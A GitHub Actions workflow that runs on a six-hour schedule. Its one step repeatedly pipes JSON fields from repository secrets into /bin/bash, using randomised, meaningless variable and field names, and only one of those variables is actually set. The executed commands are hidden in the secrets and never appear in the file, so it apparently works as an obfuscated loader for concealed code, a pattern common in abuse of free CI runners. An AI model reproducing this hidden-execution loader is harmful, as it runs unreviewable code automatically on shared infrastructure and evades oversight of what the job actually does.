name: qingtongqingong
on:
  workflow_dispatch:
  schedule:
    - cron: '13 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: qingtongqingong
        env:
          nol87: ${{ secrets.nol87 }}
        run: |
          echo $nol87 | jq -r .px924 | /bin/bash
          echo $szz08090 | jq -r .evni77119 | /bin/bash
          echo $dr2 | jq -r .qtu11 | /bin/bash
          echo $o20078 | jq -r .ku60969 | /bin/bash
          echo $qkh07080 | jq -r .axjwn30 | /bin/bash
          echo $h3 | jq -r .bjw55 | /bin/bash
          echo $fnp5640 | jq -r .ol7379 | /bin/bash
          echo $x14 | jq -r .fw4 | /bin/bash
          echo $xarzf91 | jq -r .kz512 | /bin/bash
          echo $t10 | jq -r .fvt182 | /bin/bash
          echo $oahd55 | jq -r .r9 | /bin/bash
          echo $l10 | jq -r .ritgh4 | /bin/bash
          echo $cox20799 | jq -r .v4021 | /bin/bash
          echo $gxn72606 | jq -r .pv309 | /bin/bash
          echo $iffjm6 | jq -r .yqr5696 | /bin/bash

